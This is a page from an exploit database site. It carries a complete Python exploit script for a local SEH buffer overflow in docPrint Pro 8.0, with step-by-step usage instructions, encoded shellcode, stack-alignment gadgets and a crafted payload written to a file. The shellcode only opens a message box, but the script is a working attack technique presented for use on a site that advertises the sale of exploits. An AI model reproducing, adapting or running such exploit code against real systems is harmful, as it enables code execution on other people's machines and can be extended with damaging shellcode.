0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
docPrint Pro 8.0 - SEH Buffer Overflow Exploit
[import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7
# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"
# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)
# Zero out registers for calculations.
zero = "\x25\x01\x01\x01\x01"
zero += "\x25\x10\x10\x10\x10"
# Stack alignment
alignment = "\x54" # push esp
alignment += "\x58" # pop eax
alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x50" # push eax
alignment += "\x5c" # pop esp
# Custom created and encoded MessageBox POC shellcode.
# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function.
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41
# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero # zero out eax
shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157
shellcode += "\x50" # push eax
# 4F554A42 4F554A42 51554B44
shellcode += zero # zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44
shellcode += "\x50" # push eax
# 153A393A 153A393A 173B3B3B
shellcode += zero
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x173b3b3b
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b
shellcode += "\x50" # push eax
# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1A27 323A0227 333B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1545 323A1545 333B1545
shellcode += zero # zero out eax
shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545
shellcode += "\x50" # push eax
# Let's roll.
payload = "\x41" * 1676
payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll
payload += "\x41" * 2 # Padding to reach alignment
payload += alignment
payload += shellcode
payload += "\x45" * (6000-len(payload))
# Write to file
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()
# 0day.today [2024-11-15] #